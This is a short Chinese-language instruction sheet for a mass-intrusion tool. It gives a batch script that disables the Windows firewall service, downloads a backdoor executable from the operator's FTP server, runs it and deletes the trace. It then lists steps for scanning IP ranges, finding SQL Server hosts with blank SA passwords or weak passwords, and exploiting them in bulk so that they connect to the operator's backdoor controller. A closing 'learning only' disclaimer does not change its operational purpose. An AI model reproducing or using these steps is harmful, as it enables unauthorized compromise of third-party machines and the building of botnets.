扫描前，先设置目录下的up.txt

up.txt内容如下：
echo open xxx.com>>1.txt              xxx.com替换为你的FTP地址
echo 用户名>>1.txt                    用户名替换为你的FTP登陆用户名
echo 密码>>1.txt                      密码替换为你的FTP密码
echo bin>>1.txt
net stop sharedaccess
echo get 后门文件名.exe>>1.txt        后门文件名.exe替换为你自己的后门程序如：server.exe
echo bye>>1.txt
ftp -s:1.txt
后门文件名.exe                        同上
后门文件名.exe                        同上
del 1.txt

设置好后保存文件。

运行攻击机：

1 输入IP段，开始扫描
2 扫描结束后，或中断扫描后，要先解析一次扫描结果，然后按探测密码按钮。
3 转到探测密码界面，按开始探测
4 探测完毕后，有SA空密码的主机会自动显示出来。
5 按批量益处按钮，开始自动益处。
6 益处完毕会弹出提示框，然后你就打开你的控制程序客户端，看有多少主机上线吧。呵呵。
7 自动扫描135主机，调用NTscan检测弱口令主机，然后自动益处
8 或者用DNTU的RPC工具远程连接主机.

本程序只提供学习测试，严禁使用本程序进行破坏，严禁入侵国内主机。
如使用者造成的一切后果，本站概不负责。